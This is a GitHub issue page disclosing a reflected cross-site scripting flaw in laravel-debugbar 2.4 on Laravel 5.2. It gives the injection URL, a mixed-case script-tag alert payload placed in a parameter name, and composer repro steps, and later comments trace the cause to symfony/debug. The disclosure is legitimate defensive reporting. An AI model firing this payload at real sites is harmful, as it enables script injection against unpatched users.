Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Security Vulnerability - Cross-site Scripting #850

Closed
om3rcitak opened this issue Jul 18, 2018 · 4 comments
Closed

Security Vulnerability - Cross-site Scripting #850

om3rcitak opened this issue Jul 18, 2018 · 4 comments
Labels

Comments

@om3rcitak
Copy link

Security Vulnerability - Cross-site Scripting

Environment

  • Version: debugbar:~2.4, laravel:5.2.*
  • OS: Unix, Windows
  • Web server: Any web server
  • PHP: <=7.2
  • Database: Any database

Injection Technical Details

URL: http://{domain}/{laravel_path}/_debugbar/open?op=get&id=om3rcitak&<scRipt>alert(21)<%2fscRipt>=om3rcitak
Parameter Type: Parameter Name
Attack Pattern: <scRipt>alert(21)<%2fscRipt>

Repro

$ composer create-project --prefer-dist laravel/laravel:5.2.*
$ cd laravel
$ composer require barryvdh/laravel-debugbar:~2.4
$ php artisan vendor:publish --provider="Barryvdh\Debugbar\ServiceProvider"
$ php artisan serve

and visit: http://{domain}/{laravel_path}/_debugbar/open?op=get&id=om3rcitak&<scRipt>alert(21)<%2fscRipt>=om3rcitak


Notes: I am testing laravel-debugger latest version (2.4) for Laravel 5.2.*. This vulnerability not effected Laravel >= 5.3 or laravel-debugger >=3.0 because Laravel using different error page template for version 5.2 and 5.3.

@om3rcitak
Copy link
Author

In fact, this vulnerability is due to the symfony/debug library.
Issue: symfony/symfony#27987
Fix commit: symfony/debug@e48bda2

@barryvdh
Copy link
Owner

So only for 2.4 version using an old Symfony version?

@om3rcitak
Copy link
Author

@barryvdh yes, but problem not from debugbar. Laravel composer json file must be change. But Laravel team don't think change the composer json file :) details: laravel/framework#24892

@stale
Copy link

stale bot commented Jul 29, 2020

This issue has been automatically marked as stale because it has not had recent activity. It will be closed if no further activity occurs.
If this issue is still present on the latest version of this library on supported Laravel versions, please let us know by replying to this issue so we can investigate further.
Thank you for your contribution! Apologies for any delayed response on our side.

@stale stale bot added the stale label Jul 29, 2020
@stale stale bot closed this as completed Aug 6, 2020
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
Projects
None yet
Development

No branches or pull requests

2 participants